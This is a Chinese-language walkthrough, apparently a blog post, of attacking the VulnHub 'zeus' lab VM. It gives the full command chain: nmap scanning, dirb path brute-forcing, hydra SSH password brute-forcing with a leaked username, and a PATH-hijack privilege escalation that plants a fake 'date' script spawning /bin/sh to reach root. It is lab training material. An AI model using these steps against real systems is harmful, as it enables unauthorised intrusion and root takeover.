本周实践的是vulnhub的zeus镜像,
下载地址,https://download.vulnhub.com/zeus/zeus-ovf.zip,
用workstation导入成功,
由于靶机用的是静态地址192.168.131.170,
在workstation里修改nat模式的dhcp地址池为192.168.131.0/24,
这样就能让kali攻击机分配到跟靶机同网段的地址,
对靶机做端口扫描sudo nmap -sS -sV -T5 -A -p- 192.168.131.170,
获取到靶机开放了22端口的ssh服务和80端口的http服务,
对http服务做路径暴破,
dirb http://192.168.131.170 /usr/share/wordlists/dirb/big.txt,
获取到http://192.168.131.170/telecom,
浏览器访问http://192.168.131.170/telecom,
发现是空白页面,查看页面源码获取到用户名gogu,
对gogu用户做ssh登录密码的暴破,
hydra -l gogu -P /usr/share/wordlists/rockyou.txt 192.168.131.170 ssh,获取到密码universal,
ssh登录到靶机,ssh [email protected],
递归查询隐藏文件,ls -lRah,获取到root权限执行的sysdate,
创建假的date程序,echo "/bin/sh" > date,
修改权限chmod 777 date,
发布环境变量,export PATH=/home/gogu:$PATH,
执行/home/gogu/.../sysdate,
id 1<&2查看当前shell权限为root,
原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之zeus的实践
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论